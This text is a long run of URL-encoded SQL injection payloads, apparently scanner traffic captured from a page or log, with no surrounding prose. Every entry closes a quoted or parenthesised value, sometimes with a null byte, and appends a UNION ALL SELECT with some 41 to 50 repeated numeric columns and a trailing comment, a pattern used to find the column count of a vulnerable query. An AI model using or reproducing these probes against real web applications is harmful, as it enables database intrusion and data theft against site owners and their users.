-1457%22%29%29%29%20UNION%20ALL%20SELECT%208164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%23 -5480%22%29%29%29%20UNION%20ALL%20SELECT%205866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%2C5866%23 -2829%22%20UNION%20ALL%20SELECT%206932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%23 -2706%22%20UNION%20ALL%20SELECT%202473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%2C2473%23 -3722%22%20UNION%20ALL%20SELECT%204121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%23 -9107%22%20UNION%20ALL%20SELECT%207971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%2C7971%23 -6922%22%20UNION%20ALL%20SELECT%201822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%23 -4882%22%20UNION%20ALL%20SELECT%207622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%23 -2104%22%20UNION%20ALL%20SELECT%207740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%2C7740%23 -4097%22%20UNION%20ALL%20SELECT%201245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%2C1245%23 -6991%22%20UNION%20ALL%20SELECT%201224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%23 -5261%22%20UNION%20ALL%20SELECT%204812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%23 -6652%25%27%29%20UNION%20ALL%20SELECT%204605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%23 -3974%25%27%29%20UNION%20ALL%20SELECT%205501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%23 -2195%25%27%29%20UNION%20ALL%20SELECT%203106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%23 -5753%25%27%29%20UNION%20ALL%20SELECT%201526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%23 -4916%25%27%29%20UNION%20ALL%20SELECT%205911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%23 -1015%25%27%29%20UNION%20ALL%20SELECT%201486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%2C1486%23 -7321%25%27%29%20UNION%20ALL%20SELECT%207593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%23 -1423%25%27%29%20UNION%20ALL%20SELECT%202485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%2C2485%23 -8682%25%27%29%20UNION%20ALL%20SELECT%201556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%23 -6837%25%27%29%20UNION%20ALL%20SELECT%207444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%23 -5877%25%27%29%29%20UNION%20ALL%20SELECT%209818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%23 -5890%25%27%29%29%20UNION%20ALL%20SELECT%208575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%2C8575%23 -6547%25%27%29%29%20UNION%20ALL%20SELECT%208444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%2C8444%23 -1845%25%27%29%29%20UNION%20ALL%20SELECT%207957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%23 -8758%25%27%29%29%20UNION%20ALL%20SELECT%208535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%2C8535%23 -8721%25%27%29%29%20UNION%20ALL%20SELECT%209718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%2C9718%23 -4736%25%27%29%29%20UNION%20ALL%20SELECT%207908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%23 -1516%25%27%29%29%20UNION%20ALL%20SELECT%206527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%23 -2368%25%27%29%29%20UNION%20ALL%20SELECT%209521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%23 -1700%25%27%29%29%20UNION%20ALL%20SELECT%204374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%2C4374%23 -9129%25%27%29%29%29%20UNION%20ALL%20SELECT%207459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%2C7459%23 -1872%25%27%29%29%29%20UNION%20ALL%20SELECT%208321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%23 -3105%25%27%29%29%29%20UNION%20ALL%20SELECT%201045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%23 -6646%25%27%29%29%29%20UNION%20ALL%20SELECT%208283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%2C8283%23 -8478%25%27%29%29%29%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%23 -5755%25%27%29%29%29%20UNION%20ALL%20SELECT%207123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%23 -5332%25%27%29%29%29%20UNION%20ALL%20SELECT%202192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%23 -9458%25%27%29%29%29%20UNION%20ALL%20SELECT%202534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%23 -6265%25%27%29%29%29%20UNION%20ALL%20SELECT%207548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%23 -9516%25%27%29%29%29%20UNION%20ALL%20SELECT%203993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%23 -1376%25%27%20UNION%20ALL%20SELECT%201727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%2C1727%23 -7229%25%27%20UNION%20ALL%20SELECT%208367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%23 -9751%25%27%20UNION%20ALL%20SELECT%209991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%23 -8178%25%27%20UNION%20ALL%20SELECT%203401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%2C3401%23 -8654%25%27%20UNION%20ALL%20SELECT%203519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%23 -4911%25%27%20UNION%20ALL%20SELECT%204363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%2C4363%23 -4805%25%27%20UNION%20ALL%20SELECT%205560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%23 -8933%25%27%20UNION%20ALL%20SELECT%208812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%23 -6247%25%27%20UNION%20ALL%20SELECT%203775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%23 -1966%25%27%20UNION%20ALL%20SELECT%209509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%23 -1878%00%27%29%20UNION%20ALL%20SELECT%205514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%23 -3204%00%27%29%20UNION%20ALL%20SELECT%209839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%2C9839%23 -5532%00%27%29%20UNION%20ALL%20SELECT%201406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%2C1406%23 -7753%00%27%29%20UNION%20ALL%20SELECT%208699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%2C8699%23 -2918%00%27%29%20UNION%20ALL%20SELECT%203110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%2C3110%23 -5649%00%27%29%20UNION%20ALL%20SELECT%209899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%23 -1461%00%27%29%20UNION%20ALL%20SELECT%207015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%2C7015%23 